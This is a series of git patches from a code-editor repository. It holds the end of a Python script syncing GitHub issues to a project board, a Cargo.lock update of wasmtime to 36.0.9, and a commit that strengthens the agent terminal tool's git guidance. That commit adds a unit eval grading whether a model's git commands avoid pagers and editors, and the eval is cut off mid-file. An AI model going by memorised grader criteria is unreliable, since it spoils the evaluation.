name dataType } + ... on ProjectV2SingleSelectField { + id name dataType options { id name } + } + ... on ProjectV2IterationField { + id name dataType + configuration { + duration startDay + iterations { id title startDate duration } + completedIterations { id title startDate duration } + } + } + } + } + } + } + } + """ + data = graphql(query, {"owner": PROJECT_OWNER, "number": PROJECT_NUMBER}) + proj = data["organization"]["projectV2"] + if not proj: + sys.exit(f"ERROR: project #{PROJECT_NUMBER} not found in {PROJECT_OWNER}") + fields_by_name = {f["name"]: f for f in proj["fields"]["nodes"]} + required = ["Status", "Intake week", "Stale since", "Aged?"] + missing = [n for n in required if n not in fields_by_name] + if missing: + sys.exit(f"ERROR: project missing required fields: {missing}") + _PROJECT_SCHEMA = {"id": proj["id"], "fields_by_name": fields_by_name} + log(f"loaded project schema: id={proj['id']}, fields={list(fields_by_name)}") + return _PROJECT_SCHEMA + + +def status_option_id(status_name: str) -> str | None: + schema = fetch_project_schema() + for opt in schema["fields_by_name"]["Status"]["options"]: + if opt["name"] == status_name: + return opt["id"] + return None + + +def aged_option_id(value: str) -> str | None: + schema = fetch_project_schema() + for opt in schema["fields_by_name"]["Aged?"]["options"]: + if opt["name"] == value: + return opt["id"] + return None + + +def iteration_id_for_date(d: datetime) -> str | None: + schema = fetch_project_schema() + field = schema["fields_by_name"]["Intake week"] + cfg = field["configuration"] + iterations = list(cfg.get("iterations") or []) + list(cfg.get("completedIterations") or []) + for it in iterations: + start = parse_dt(it["startDate"] + "T00:00:00+00:00") + if start is None: + continue + end = start + timedelta(days=int(it["duration"])) + if start <= d < end: + return it["id"] + return None + + +# --------------------------------------------------------------------------- +# Project item lookup / mutation + + +def get_project_item_id(issue_node_id: str) -> str | None: + """Returns the ProjectV2Item.id for the issue in our project, or None.""" + schema = fetch_project_schema() + project_id = schema["id"] + query = """ + query($issueId: ID!) { + node(id: $issueId) { + ... on Issue { + projectItems(first: 100) { + pageInfo { hasNextPage } + nodes { id project { id } } + } + } + } + } + """ + data = graphql(query, {"issueId": issue_node_id}) + node = data["node"] + if not node: + return None + items_block = node["projectItems"] + for item in items_block["nodes"]: + if item["project"]["id"] == project_id: + return item["id"] + if items_block["pageInfo"]["hasNextPage"]: + # Issue is on >100 projects; very unlikely. Log + return None. + log(f"issue {issue_node_id} on >100 projects, can't find ours in first page", "WARN") + return None + + +def add_to_project(issue_node_id: str) -> str: + schema = fetch_project_schema() + mutation = """ + mutation($projectId: ID!, $issueId: ID!) { + addProjectV2ItemById(input: { projectId: $projectId, contentId: $issueId }) { + item { id } + } + } + """ + data = graphql(mutation, {"projectId": schema["id"], "issueId": issue_node_id}) + return data["addProjectV2ItemById"]["item"]["id"] + + + + +def update_single_select(item_id: str, field_id: str, option_id: str, dry_run: bool) -> None: + if dry_run: + log(f" [DRY] single-select field={field_id} option={option_id} on item={item_id}") + return + schema = fetch_project_schema() + mutation = """ + mutation($projectId: ID!, $itemId: ID!, $fieldId: ID!, $optionId: String!) { + updateProjectV2ItemFieldValue(input: { + projectId: $projectId, itemId: $itemId, fieldId: $fieldId, + value: { singleSelectOptionId: $optionId } + }) { projectV2Item { id } } + } + """ + graphql( + mutation, + { + "projectId": schema["id"], + "itemId": item_id, + "fieldId": field_id, + "optionId": option_id, + }, + ) + + +def update_date(item_id: str, field_id: str, date_iso: str, dry_run: bool) -> None: + if dry_run: + log(f" [DRY] date field={field_id} value={date_iso} on item={item_id}") + return + schema = fetch_project_schema() + mutation = """ + mutation($projectId: ID!, $itemId: ID!, $fieldId: ID!, $date: Date!) { + updateProjectV2ItemFieldValue(input: { + projectId: $projectId, itemId: $itemId, fieldId: $fieldId, + value: { date: $date } + }) { projectV2Item { id } } + } + """ + graphql( + mutation, + {"projectId": schema["id"], "itemId": item_id, "fieldId": field_id, "date": date_iso}, + ) + + +def update_iteration(item_id: str, field_id: str, iteration_id: str, dry_run: bool) -> None: + if dry_run: + log(f" [DRY] iteration field={field_id} value={iteration_id} on item={item_id}") + return + schema = fetch_project_schema() + mutation = """ + mutation($projectId: ID!, $itemId: ID!, $fieldId: ID!, $iterId: String!) { + updateProjectV2ItemFieldValue(input: { + projectId: $projectId, itemId: $itemId, fieldId: $fieldId, + value: { iterationId: $iterId } + }) { projectV2Item { id } } + } + """ + graphql( + mutation, + { + "projectId": schema["id"], + "itemId": item_id, + "fieldId": field_id, + "iterId": iteration_id, + }, + ) + + +# --------------------------------------------------------------------------- +# Sync + + +def sync_issue(number: int, dry_run: bool = False) -> None: + """Sync a single issue. Adds to project if missing, then updates fields. + + Idempotent — running twice with the same issue state has no effect after + the first run. + """ + log(f"sync #{number} (dry_run={dry_run})") + issue = fetch_issue(number) + + if issue.is_pull_request: + log(f" #{number} is a PR; skipping (project tracks issues)") + return + + # Skip administrative issue types (Meta, Tracking, etc.). These are + # collections / dashboards, not triage work. The script doesn't have + # permission to remove items from the project (intentional — narrows blast + # radius). Existing Meta/Tracking items in the project should be removed + # manually one-time; new ones get auto-added by the project's auto-add + # workflow but the sync below skips them, so they sit with no Status / + # Aged? / Stale since fields set and don't appear in any status-filtered + # view. + if issue.issue_type in SKIP_ISSUE_TYPES: + log(f" #{number} is type={issue.issue_type}; not a triage item, skipping fields") + return + + staff = fetch_staff() + + status, rule, why = derive_status(issue, staff) + stale_since = derive_stale_since(issue, status, staff) + aged, aged_why = derive_aged(status, stale_since) + intake_iter_id = iteration_id_for_date(issue.created_at) + + log(f" status={status} ({rule}: {why})") + log(f" stale_since={stale_since.isoformat() if stale_since else 'none'}") + log(f" aged={aged} ({aged_why})") + log(f" intake_iteration_id={intake_iter_id or 'none (created_at outside iteration range)'}") + + schema = fetch_project_schema() + item_id = get_project_item_id(issue.node_id) + if not item_id: + if dry_run: + log(" [DRY] would add to project (item not yet present)") + return + item_id = add_to_project(issue.node_id) + log(f" added to project as item={item_id}") + + # Status (always set) + sid = status_option_id(status) + if not sid: + log(f" ERROR: no Status option named '{status}' in project; skipping status update", "ERROR") + else: + update_single_select( + item_id, schema["fields_by_name"]["Status"]["id"], sid, dry_run + ) + + # Aged? (always set) + aged_id = aged_option_id(aged) + if not aged_id: + log(f" ERROR: no Aged? option named '{aged}'; skipping", "ERROR") + else: + update_single_select( + item_id, schema["fields_by_name"]["Aged?"]["id"], aged_id, dry_run + ) + + # Stale since (only set when meaningful) + if stale_since: + update_date( + item_id, + schema["fields_by_name"]["Stale since"]["id"], + stale_since.date().isoformat(), + dry_run, + ) + + # Intake week (only set when an iteration covers the created_at) + if intake_iter_id: + update_iteration( + item_id, + schema["fields_by_name"]["Intake week"]["id"], + intake_iter_id, + dry_run, + ) + + +def sync_all(dry_run: bool = False) -> None: + """Sync every item currently in the project. Cron mode.""" + log("fetching all project items…") + cursor: str | None = None + total = 0 + failed = 0 + while True: + query = """ + query($owner: String!, $number: Int!, $cursor: String) { + organization(login: $owner) { + projectV2(number: $number) { + items(first: 100, after: $cursor) { + pageInfo { hasNextPage endCursor } + nodes { + id + content { + __typename + ... on Issue { number } + ... on PullRequest { number } + } + } + } + } + } + } + """ + data = graphql( + query, {"owner": PROJECT_OWNER, "number": PROJECT_NUMBER, "cursor": cursor} + ) + items_block = data["organization"]["projectV2"]["items"] + for item in items_block["nodes"]: + content = item.get("content") + if not content: + continue + if content["__typename"] != "Issue": + continue + num = content["number"] + try: + sync_issue(num, dry_run=dry_run) + except Exception as e: + log(f"sync #{num} failed: {e}", "ERROR") + failed += 1 + total += 1 + if not items_block["pageInfo"]["hasNextPage"]: + break + cursor = items_block["pageInfo"]["endCursor"] + log(f"done: synced {total} items, {failed} failed") + + +# --------------------------------------------------------------------------- +# Main + + +def main() -> int: + global _TOKEN + + ap = argparse.ArgumentParser(description=__doc__) + grp = ap.add_mutually_exclusive_group(required=True) + grp.add_argument("--issue", type=int, help="sync a single issue by number") + grp.add_argument("--all", action="store_true", help="sync every project item") + ap.add_argument("--dry-run", action="store_true", help="compute but don't mutate") + args = ap.parse_args() + + _TOKEN = get_token() + + if args.issue: + sync_issue(args.issue, dry_run=args.dry_run) + elif args.all: + sync_all(dry_run=args.dry_run) + + return 0 + + +if __name__ == "__main__": + sys.exit(main()) From 2373ae36dc930543b0428ec6dfaee04d408fe0c8 Mon Sep 17 00:00:00 2001 From: Ben Brandt Date: Tue, 5 May 2026 21:29:49 +0200 Subject: [PATCH 209/231] Update to wasmtime 36.0.9 (#55811) Brings in backported fixes to solve some panics we've been seeing Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Release Notes: - N/A --- Cargo.lock | 168 ++++++++++++++++++++++++++--------------------------- 1 file changed, 84 insertions(+), 84 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 083aeeef57b9ed..2a28d8922505ea 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -3960,36 +3960,36 @@ dependencies = [ [[package]] name = "cranelift-assembler-x64" -version = "0.123.8" +version = "0.123.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cb1ffe339f197d6645b4d3037edf67c13cd3aa8871f29c2c9c046c729c1b9a17" +checksum = "44f81cede359311706057b689b91b59f464926de0316f389898a2b028cb494fa" dependencies = [ "cranelift-assembler-x64-meta", ] [[package]] name = "cranelift-assembler-x64-meta" -version = "0.123.8" +version = "0.123.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1e81a21df73d1b12ed19eba481c08de8891e179e1870ed28d6e397f7746108f5" +checksum = "fa6ca11305de425ea08884097b913ebe1a83875253b3c0063ce28411e226bfdc" dependencies = [ "cranelift-srcgen", ] [[package]] name = "cranelift-bforest" -version = "0.123.8" +version = "0.123.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3cf917d0180c15c945c13c8dde615d32a015769513b29158f728311d85a8f80d" +checksum = "7537341a9a4ba9812141927be733e7254bf2318aab6597d567af9cad90609f27" dependencies = [ "cranelift-entity", ] [[package]] name = "cranelift-bitset" -version = "0.123.8" +version = "0.123.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a6f4e1af2df00798c2895d228bb53d65c5aa09acace8525096f0b53830ffe42c" +checksum = "d28a4ca5faf25ff821fcc768f26e68ffef505e9f71bb06e608862d941fa65086" dependencies = [ "serde", "serde_derive", @@ -3997,9 +3997,9 @@ dependencies = [ [[package]] name = "cranelift-codegen" -version = "0.123.8" +version = "0.123.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4e3a5d7300e4b44933dcf2947399945abe3f30f92c789b496ad72949e3ee15a6" +checksum = "d891057fe1b73910c41e73b32a70fa8454092fce65942b5fa6f72aa6d5487f8a" dependencies = [ "bumpalo", "cranelift-assembler-x64", @@ -4027,9 +4027,9 @@ dependencies = [ [[package]] name = "cranelift-codegen-meta" -version = "0.123.8" +version = "0.123.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "becdb5c3111800d7f8e666fe5f35693bfc77de4401bfcaea19815caf7c482fb9" +checksum = "c29a66028a78eedc534b3a94e5ebfbaeb4e1f6b09038afe41bb24afd614faa4b" dependencies = [ "cranelift-assembler-x64-meta", "cranelift-codegen-shared", @@ -4040,24 +4040,24 @@ dependencies = [ [[package]] name = "cranelift-codegen-shared" -version = "0.123.8" +version = "0.123.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d8fa77efffa12934971f757e154b16dd5e369a7f388a0f3adff74aadfd4c5a1d" +checksum = "95809ad251fe9422087b4a72d61e584d6ab6eff44dee1335f93cfaea0bedc9ac" [[package]] name = "cranelift-control" -version = "0.123.8" +version = "0.123.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "62441d3aae3372381e03a121880482158ce90ca3bc2a56607cc122ee07536fe4" +checksum = "f79d0cacf063c297e5e8d5b73cb355b41b87f6d248e252d1b284e7a7b73673c2" dependencies = [ "arbitrary", ] [[package]] name = "cranelift-entity" -version = "0.123.8" +version = "0.123.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "7bdc9832a010e0d411439aa016e1664dd23ca5c8953bf26b90fe34ad4b76822d" +checksum = "b2d73297a195ce3be55997c6307142c4b1e58dd0c2f18ceaa0179444024e312a" dependencies = [ "cranelift-bitset", "serde", @@ -4066,9 +4066,9 @@ dependencies = [ [[package]] name = "cranelift-frontend" -version = "0.123.8" +version = "0.123.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9530b689b7c3accdbb32263ca318e19ab3bcf616d3a160c8456537c99b4c565b" +checksum = "3be38d1ae29ef7c5d611fc6cb694f698dc4ca44152dcaa112ec0fef8d4d34858" dependencies = [ "cranelift-codegen", "log", @@ -4078,15 +4078,15 @@ dependencies = [ [[package]] name = "cranelift-isle" -version = "0.123.8" +version = "0.123.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "3fcd3258a4d87376f2681c72269a42009286a3d3707b2af4024ba5b3750ad477" +checksum = "6761926f6636209de7ac568be28b206890f2181761375b9722e0a1e7a7e1637a" [[package]] name = "cranelift-native" -version = "0.123.8" +version = "0.123.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "642c5703a22b58abccbf46f46c0dae65f0535bbe725beec70527a1ffcbbc1d34" +checksum = "0893472f73f0d530a28e9a573ada6d1f93b9659bb6734dfe17061ac967bd1830" dependencies = [ "cranelift-codegen", "libc", @@ -4095,9 +4095,9 @@ dependencies = [ [[package]] name = "cranelift-srcgen" -version = "0.123.8" +version = "0.123.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d200dcd5a37de108ec1329e0ba924e2badd2c0ef2343c338310135159ae454e2" +checksum = "c1daccebabb1ccd034dbab0eacc0722af27d3cccc7929dea27a3546cb3562e40" [[package]] name = "crash-context" @@ -5021,7 +5021,7 @@ dependencies = [ "libc", "option-ext", "redox_users", - "windows-sys 0.59.0", + "windows-sys 0.61.2", ] [[package]] @@ -5811,7 +5811,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "39cab71617ae0d63f51a36d69f866391735b51691dbda63cf6f96d042b63efeb" dependencies = [ "libc", - "windows-sys 0.52.0", + "windows-sys 0.61.2", ] [[package]] @@ -7269,7 +7269,7 @@ dependencies = [ "gobject-sys", "libc", "system-deps", - "windows-sys 0.52.0", + "windows-sys 0.61.2", ] [[package]] @@ -8597,7 +8597,7 @@ dependencies = [ "libc", "percent-encoding", "pin-project-lite", - "socket2 0.6.3", + "socket2 0.5.10", "tokio", "tower-service", "tracing", @@ -8615,7 +8615,7 @@ dependencies = [ "js-sys", "log", "wasm-bindgen", - "windows-core 0.56.0", + "windows-core 0.57.0", ] [[package]] @@ -11264,7 +11264,7 @@ version = "0.50.3" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "7957b9740744892f114936ab4a57b3f487491bbeafaf8083688b16841a4240e5" dependencies = [ - "windows-sys 0.59.0", + "windows-sys 0.61.2", ] [[package]] @@ -13879,9 +13879,9 @@ checksum = "bd348ff538bc9caeda7ee8cad2d1d48236a1f443c1fa3913c6a02fe0043b1dd3" [[package]] name = "pulley-interpreter" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "35eaba3163b9faf1d707f0704a7370bfdbe73622c766acdaf1fa4addb87510de" +checksum = "8b78fdec962b639b921badfcfe77db7d18aa3c0c1e292ac2aa268c0efe8fe683" dependencies = [ "cranelift-bitset", "log", @@ -13891,9 +13891,9 @@ dependencies = [ [[package]] name = "pulley-macros" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ac294897a29ce07919714f9f25c11a819d75759d47eb9f3273845ffea5a5760d" +checksum = "f718f4e8cd5fdfa08b3b1d2d25fe288350051be330544305f0a9b93a937b3d42" dependencies = [ "proc-macro2", "quote", @@ -13996,7 +13996,7 @@ dependencies = [ "quinn-udp", "rustc-hash 2.1.1", "rustls 0.23.40", - "socket2 0.6.3", + "socket2 0.5.10", "thiserror 2.0.17", "tokio", "tracing", @@ -14033,9 +14033,9 @@ dependencies = [ "cfg_aliases 0.2.1", "libc", "once_cell", - "socket2 0.6.3", + "socket2 0.5.10", "tracing", - "windows-sys 0.52.0", + "windows-sys 0.60.2", ] [[package]] @@ -15251,7 +15251,7 @@ dependencies = [ "errno 0.3.14", "libc", "linux-raw-sys 0.11.0", - "windows-sys 0.52.0", + "windows-sys 0.61.2", ] [[package]] @@ -17739,7 +17739,7 @@ dependencies = [ "getrandom 0.3.4", "once_cell", "rustix 1.1.2", - "windows-sys 0.52.0", + "windows-sys 0.61.2", ] [[package]] @@ -19938,9 +19938,9 @@ dependencies = [ [[package]] name = "wasmtime" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2060d93be880840d764ab537464b916e22c07758ac5d43e5f07cc86fec6d1bec" +checksum = "b10306ead921db2c4645ff99867b7539b65e18afd8816d471547f5e6f3b09492" dependencies = [ "addr2line", "anyhow", @@ -19999,9 +19999,9 @@ dependencies = [ [[package]] name = "wasmtime-environ" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "902f991ca8c2e5abc03119eb5d7f7f57da1b7c2123addb8214b49c188737711e" +checksum = "e7fb2c37ca263d444f33871bf0221e7de0707b2b2bb88165df6db6d58c73375f" dependencies = [ "anyhow", "cpp_demangle", @@ -20026,9 +20026,9 @@ dependencies = [ [[package]] name = "wasmtime-internal-asm-macros" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "b02cec619b54ce7652d1d7676718a42ccf5f16b2fb23c27cd6e3c307bc93907a" +checksum = "19c6c0d3c8d2db554a3af8e8d413ff2815362ebce0911808ecfdaaa257438f93" dependencies = [ "cfg-if", ] @@ -20045,9 +20045,9 @@ dependencies = [ [[package]] name = "wasmtime-internal-component-macro" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "fad82a87bc24b6014c5271e1558e466fd029dcc80896f143b3693394a162f3be" +checksum = "c3e3f3752466eb0e1f97149e53bf15c0e18ff520fc0a98b4bee1680e6de1c6f0" dependencies = [ "anyhow", "proc-macro2", @@ -20060,15 +20060,15 @@ dependencies = [ [[package]] name = "wasmtime-internal-component-util" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6bc24aba0bfd3d39fa8f0012835bc4d4efc75b1350b5e519181319eb8bb306b2" +checksum = "7f54018baf62f4e9c616c31f2aeadcf0c202ff691a390ad53e291ae7160b169e" [[package]] name = "wasmtime-internal-cranelift" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "54eb7fc20c8692dc96148365d7a00a1b79fee810833c75bdf8ec073a46e4721a" +checksum = "5a2412f2afb0a5db2a4ac1cfff73247e240aeaa90bf41497ad0a5084b6a24eca" dependencies = [ "anyhow", "cfg-if", @@ -20093,9 +20093,9 @@ dependencies = [ [[package]] name = "wasmtime-internal-fiber" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "30708e122dcc1e175c66345c209c01752ca0cd20c9021721b6f56968342e9dbe" +checksum = "ecfdc460dd5d343d88ff1ffaf65ae019feeb6124ddcfd3f39d28331068d25b1f" dependencies = [ "anyhow", "cc", @@ -20109,9 +20109,9 @@ dependencies = [ [[package]] name = "wasmtime-internal-jit-debug" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1eeaab071a646d9ae205266adf186c63fa6d077d36b0b33628dd6c3d321d3195" +checksum = "b5abb428a71827b7f90fc64406749883ccc6e58addf6d36974d5e06942011707" dependencies = [ "cc", "wasmtime-internal-versioned-export-macros", @@ -20119,9 +20119,9 @@ dependencies = [ [[package]] name = "wasmtime-internal-jit-icache-coherence" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "09979561e6e4a17bf55722463b066ccb968f010ac6ec5d647e4dff19eddbb19e" +checksum = "ba6cc13f14c3fb83fb877cb1d5c605e93f7ec1bf7fc1a5e8b361209d2f8ca028" dependencies = [ "anyhow", "cfg-if", @@ -20131,24 +20131,24 @@ dependencies = [ [[package]] name = "wasmtime-internal-math" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9193eb852e5c68aeb95a5ea7538c2bec503023169a0b24430224b4f1ded24988" +checksum = "1cb209473a09f4dbd9c87bb9f18b8dcb0c9da30d12a260e3eacf7a1a53b41480" dependencies = [ "libm", ] [[package]] name = "wasmtime-internal-slab" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "289bfa4fbb43f406f36166737f1f25522c215ef2ef11f98423089a6a7590a3d1" +checksum = "aab4df5a04752106e1ecef9d40145ef28fa033b0d5dd3c839c9b208b2d522183" [[package]] name = "wasmtime-internal-unwinder" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4e748c970993865d9bf474465c3f10f96e541c472bc8f7ec0b031779f4ac29c6" +checksum = "5359875d29bddb6f7e65e698157714d8d35ebd8ea2a92893d05d6b062147b639" dependencies = [ "anyhow", "cfg-if", @@ -20159,9 +20159,9 @@ dependencies = [ [[package]] name = "wasmtime-internal-versioned-export-macros" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e97e07438cb8b50df3bc9659c56757830a15235c94268dbbd54186524fd4ed84" +checksum = "2e247bcdd69701743ba386c933b26ebad2ce912ff9cb68b5b71fdb29d39ba04a" dependencies = [ "proc-macro2", "quote", @@ -20170,9 +20170,9 @@ dependencies = [ [[package]] name = "wasmtime-internal-winch" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "107aa0c3f71cc590c786d6d6e09893558b383f4d78107b864a9fd978929d0244" +checksum = "d0298dfd9f57588222b5a92dcffe75894f1ead4e519850f176bde7fcfd105d54" dependencies = [ "anyhow", "cranelift-codegen", @@ -20187,9 +20187,9 @@ dependencies = [ [[package]] name = "wasmtime-internal-wit-bindgen" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "eeb3d8e4efdaae10aa01264e9946bba507e53707125dd0aa8584b5e13229a3c0" +checksum = "1706803e83b9bae726a0f55e7c1bbf78a7421cf2da68c940c70978e91dfc0339" dependencies = [ "anyhow", "bitflags 2.10.0", @@ -20200,9 +20200,9 @@ dependencies = [ [[package]] name = "wasmtime-wasi" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "86fffc455304d2750ea2456394cdf6513d8771eb5b256876685b8bb9413bfb0e" +checksum = "1a430602ec54d0e32fbb61d2d8c7e5885eaa9dbc1664b6ed57fb57df439810a0" dependencies = [ "anyhow", "async-trait", @@ -20231,9 +20231,9 @@ dependencies = [ [[package]] name = "wasmtime-wasi-io" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5666a220e8318309225b54a55b270e1b506385adcce10bf5698380441afa0df3" +checksum = "8b2ba5dd68962de394cf15c7fb185f138cdd685ced631a7ed8e056de3e071029" dependencies = [ "anyhow", "async-trait", @@ -20698,9 +20698,9 @@ dependencies = [ [[package]] name = "wiggle" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4e176546937d1311c7608276c8511d3ea9b8e7b916e89b720e12c4d4bbae067c" +checksum = "1979d3ed3ffc017538e518da6faa66b129f9229492981fc51004f28cb86db792" dependencies = [ "anyhow", "async-trait", @@ -20713,9 +20713,9 @@ dependencies = [ [[package]] name = "wiggle-generate" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e3f012ad76133d9ac70633c7f954e289fb4c21986059f324fec3c476664ab643" +checksum = "25d92ae7a084d8543aa7ccef0fac52c86481a7278d0533f7fdeaf89bd7b7e29f" dependencies = [ "anyhow", "heck 0.5.0", @@ -20727,9 +20727,9 @@ dependencies = [ [[package]] name = "wiggle-macro" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4301e6203d3d13eef139fa3aca5f04e9156b4a5f7636ca965b2c10bce410b3d2" +checksum = "36a1b1b93fd9ce569bb40c1eadf5c56533cebfc04ba545c8bc1e74464cff0735" dependencies = [ "proc-macro2", "quote", @@ -20759,7 +20759,7 @@ version = "0.1.11" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "c2a7b1c03c876122aa43f3020e6c3c3ee5c05081c9a00739faf7503aeba10d22" dependencies = [ - "windows-sys 0.48.0", + "windows-sys 0.61.2", ] [[package]] @@ -20770,9 +20770,9 @@ checksum = "712e227841d057c1ee1cd2fb22fa7e5a5461ae8e48fa2ca79ec42cfc1931183f" [[package]] name = "winch-codegen" -version = "36.0.8" +version = "36.0.9" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "646e2d01f59d7006e24a370762abfb63d5918696ff02197e027efd15252a1f79" +checksum = "2e2d7ea2137be52644d9c42ca5a4899bba07c2ed2db1e66c4c1994adfe35d39e" dependencies = [ "anyhow", "cranelift-assembler-x64", From 2e254857bc7adbd628cf40895a9b30f379c31943 Mon Sep 17 00:00:00 2001 From: Richard Feldman Date: Tue, 5 May 2026 15:51:55 -0400 Subject: [PATCH 210/231] Strengthen guidance for git commands in the terminal tool (#55787) Move guidance about pty-blocking commands from the `TerminalToolInput` struct-level doc comment to the `command` field's doc comment so it's surfaced more prominently to the model in the tool's JSON schema, and call out `--no-pager` and `GIT_EDITOR=true` explicitly for git operations. In practice, the previous wording about `git --no-pager diff` was easy for agents to overlook, leading to terminal calls that block waiting on `less` (for `git log`/`git diff`/`git show`) or on an interactive editor (for `git rebase`/`git commit`/`git merge`). Unit eval change before/after wording change: image Closes AI-154 Release Notes: - Zed Agent's terminal tool now much more consistently uses `--no-pager` and `GIT_EDITOR` with `git` commands --- crates/agent/src/tools/evals.rs | 2 + crates/agent/src/tools/evals/terminal_tool.rs | 528 ++++++++++++++++++ crates/agent/src/tools/terminal_tool.rs | 9 +- 3 files changed, 537 insertions(+), 2 deletions(-) create mode 100644 crates/agent/src/tools/evals/terminal_tool.rs diff --git a/crates/agent/src/tools/evals.rs b/crates/agent/src/tools/evals.rs index b5d9f47ea5def0..a2e09b3f8aa9ed 100644 --- a/crates/agent/src/tools/evals.rs +++ b/crates/agent/src/tools/evals.rs @@ -1,2 +1,4 @@ #[cfg(all(test, feature = "unit-eval"))] mod edit_file; +#[cfg(all(test, feature = "unit-eval"))] +mod terminal_tool; diff --git a/crates/agent/src/tools/evals/terminal_tool.rs b/crates/agent/src/tools/evals/terminal_tool.rs new file mode 100644 index 00000000000000..3769df5abed0bc --- /dev/null +++ b/crates/agent/src/tools/evals/terminal_tool.rs @@ -0,0 +1,528 @@ +use crate::{AgentTool, Template, Templates, TerminalTool, TerminalToolInput}; +use Role::*; +use anyhow::{Context as _, Result}; +use client::{Client, RefreshLlmTokenListener, UserStore}; +use futures::StreamExt; +use gpui::{AppContext as _, AsyncApp, TestAppContext}; +use http_client::StatusCode; +use language_model::{ + LanguageModel, LanguageModelCompletionError, LanguageModelCompletionEvent, + LanguageModelRegistry, LanguageModelRequest, LanguageModelRequestMessage, MessageContent, Role, + SelectedModel, +}; +use prompt_store::{ProjectContext, WorktreeContext}; +use rand::prelude::*; +use reqwest_client::ReqwestClient; +use settings::SettingsStore; +use std::{ + fmt::{self, Display}, + path::Path, + str::FromStr, + sync::Arc, + time::Duration, +}; + +#[derive(Clone)] +struct EvalInput { + conversation: Vec, + assertion: CommandAssertion, +} + +impl EvalInput { + fn new(conversation: Vec, assertion: CommandAssertion) -> Self { + Self { + conversation, + assertion, + } + } +} + +#[derive(Clone, Debug, Eq, PartialEq, Hash)] +struct EvalAssertionOutcome { + score: usize, + message: Option, +} + +type AssertionFn = Arc EvalAssertionOutcome + Send + Sync + 'static>; + +#[derive(Clone)] +struct CommandAssertion { + description: &'static str, + check: AssertionFn, +} + +impl CommandAssertion { + fn new( + description: &'static str, + check: impl Fn(&TerminalToolInput) -> EvalAssertionOutcome + Send + Sync + 'static, + ) -> Self { + Self { + description, + check: Arc::new(check), + } + } + + /// Passes when the command is a git command and every git subcommand that + /// could block on a pty (pager or editor) is guarded with the appropriate + /// environment variable or flag. + /// + /// This is intentionally permissive about *which* git subcommand the model + /// chooses — for an indirect prompt like "combine my last 3 commits", the + /// model is free to first investigate with `git log` or jump straight to + /// `git rebase -i`. Either is fine, as long as whatever it picks won't + /// hang on a pager or editor. + fn git_pty_safe(description: &'static str) -> Self { + Self::new(description, |input| { + let cmd = input.command.as_str(); + let words: Vec<&str> = cmd.split_whitespace().collect(); + + if !words.contains(&"git") { + return EvalAssertionOutcome { + score: 0, + message: Some(format!("Expected a `git` command, got: {cmd}")), + }; + } + + // Subcommands that pipe their output through a pager by default, + // and so will hang on `less` unless one of these escape hatches is + // present somewhere in the command: + const PAGER_SUBCMDS: &[&str] = &["log", "diff", "show", "blame"]; + const PAGER_GUARDS: &[&str] = &["--no-pager", "GIT_PAGER=cat", "PAGER=cat"]; + + // Subcommands that may invoke an interactive editor and so will + // hang unless one of these escape hatches is present: + const EDITOR_SUBCMDS: &[&str] = &["rebase", "commit", "merge", "tag"]; + const EDITOR_GUARDS: &[&str] = + &["GIT_EDITOR=true", 